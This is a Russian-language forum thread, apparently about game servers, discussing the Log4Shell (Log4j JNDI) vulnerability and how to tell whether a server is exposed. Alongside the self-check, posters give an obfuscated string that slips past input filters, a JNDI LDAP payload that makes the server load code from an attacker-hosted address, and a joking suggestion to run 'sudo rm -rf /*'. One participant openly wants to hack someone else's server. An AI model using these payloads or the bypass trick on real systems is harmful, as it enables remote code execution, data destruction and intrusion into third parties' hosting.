Смотрите видео ниже, чтобы узнать, как установить наш сайт в качестве веб-приложения на домашнем экране.
Примечание: This feature may not be available in some browsers.
каким образом проверить что могут взломать сервер?
Зависит от хостинга. Все нормальные должны были исправить это.или он не угрожает серверам которая не на вдс/дедик а на хостинг панели?
Пишут что от ядра сервера тоже зависит.Авторизуйтесь для просмотра ссылок.
Зависит от хостинга. Все нормальные должны были исправить это.
Если это исправено в ядре - то это исправено в ядре. Если это не исправлено в ядре, то это не исправлено в ядре. Ауф.Пишут что от ядра сервера тоже зависит
Интересный факт. На одном панельном хосте есть защита от такого мусора, НО только если ты пишешь ${jndi:***} непосредственноАвторизуйтесь для просмотра ссылок.
я еще видел хостинг который не дает возможность создать файл с именем pluginmetrics.jar. неужели нельзя нормально фиксы делать а не просто блокировать ввод жнди?Интересный факт. На одном панельном хосте есть защита от такого мусора, НО только если ты пишешь ${jndi:***} непосредственно
В то же время ${${env:ENV_NAME:-j}ndi:***}, который имеет тот же самый эффект - спокойно проходит
Ввел,дату выбило но толку? Как запустить тот же sh start.sh чтобы убедиться что сервер защищён?Если это исправено в ядре - то это исправено в ядре. Если это не исправлено в ядре, то это не исправлено в ядре. Ауф.
В оф.ядрах пейпер всё исправлено на всех версиях.
Самый простой же способ проверить твоё ядро - прописать в консоли say ${date:YYYY}
Выбило дату - ты подвержен
Объединено
Интересный факт. На одном панельном хосте есть защита от такого мусора, НО только если ты пишешь ${jndi:***} непосредственно
В то же время ${${env:ENV_NAME:-j}ndi:***}, который имеет тот же самый эффект - спокойно проходит
Выбило дату - может выполнить код.Ввел,дату выбило но толку?
Подробный гайд как пользоваться и репозиторий на гитхабе. Шаришь в жабе - напиши код который тебе выполнит команду sudo rm -rf /*, будет тебе веселуха.Как запустить тот же sh start.sh чтобы убедиться что сервер защищён?
Ха-ха - предлагаешь стереть хостинг?Выбило дату - может выполнить код.
Подробный гайд как пользоваться и репозиторий на гитхабе. Шаришь в жабе - напиши код который тебе выполнит команду sudo rm -rf /*, будет тебе веселуха.
You must be registered for see mediasАвторизуйтесь для просмотра ссылок.
У них еще аж одна есть!Ха-ха - предлагаешь стереть free ноду Russiannodes?
Так там не показывают как взломать сервер, ток как взломать чужой ПК.Выбило дату - может выполнить код.
Подробный гайд как пользоваться и репозиторий на гитхабе. Шаришь в жабе - напиши код который тебе выполнит команду sudo rm -rf /*, будет тебе веселуха.
You must be registered for see mediasАвторизуйтесь для просмотра ссылок.
В чем отличие?Так там не показывают как взломать сервер, ток как взломать чужой ПК.
Как минимум порты закрыты т.к панельные хосты дают два рандом порта.В чем отличие?
При чем тут порты на твоем компьютере, если код выполняется на утсройстве не зависимо от того открыты ли у него порты? Если по указанному адресу есть класс с кодом который можно выполнить - машина его выполнит.Как минимум порты закрыты т.к панельные хосты дают два рандом порта.
В видео порты открыты т.к все делается в одной внутренней сети.
потому что:${jndi:ldap://10.10.10.10:1389/Log4JCE} зачем вводят на сервере?При чем тут порты на твоем компьютере, если код выполняется на утсройстве не зависимо от того открыты ли у него порты? Если по указанному адресу есть класс с кодом который можно выполнить - машина его выполнит.
Чтобы сервер обратился по этому IP и порту для выполнения кода Log4JCEзачем вводят на сервере?
ну вот он обращается к компу который хочешь взломать? а мне надо сервер взломать а не чей-то пкЧтобы сервер обратился по этому IP и порту для выполнения кода Log4JCE
Лол нет. Он обращается по ТВОЕМУ IP, на котором ты раззмещаешь вредоносный кодну вот он обращается к компу который хочешь взломать?
просто уйди с параша нодес и обнови ядрону вот он обращается к компу который хочешь взломать? а мне надо сервер взломать а не чей-то пк
что то запутанно все, какой вбивать аипи если ты создал серв на хосте а не своем пк?Лол нет. Он обращается по ТВОЕМУ IP, на котором ты раззмещаешь вредоносный код
Придется открывать IP на компудахтере, что логично хреновый варианткакой вбивать аипи если ты создал серв на хосте а не своем пк?
IP бл... порты!Придется открывать IP на компудахтере, что логично хреновый вариант
Мы используем основные cookies для обеспечения работы этого сайта, а также дополнительные cookies для обеспечения максимального удобства пользователя.
Посмотрите дополнительную информацию и настройте свои предпочтения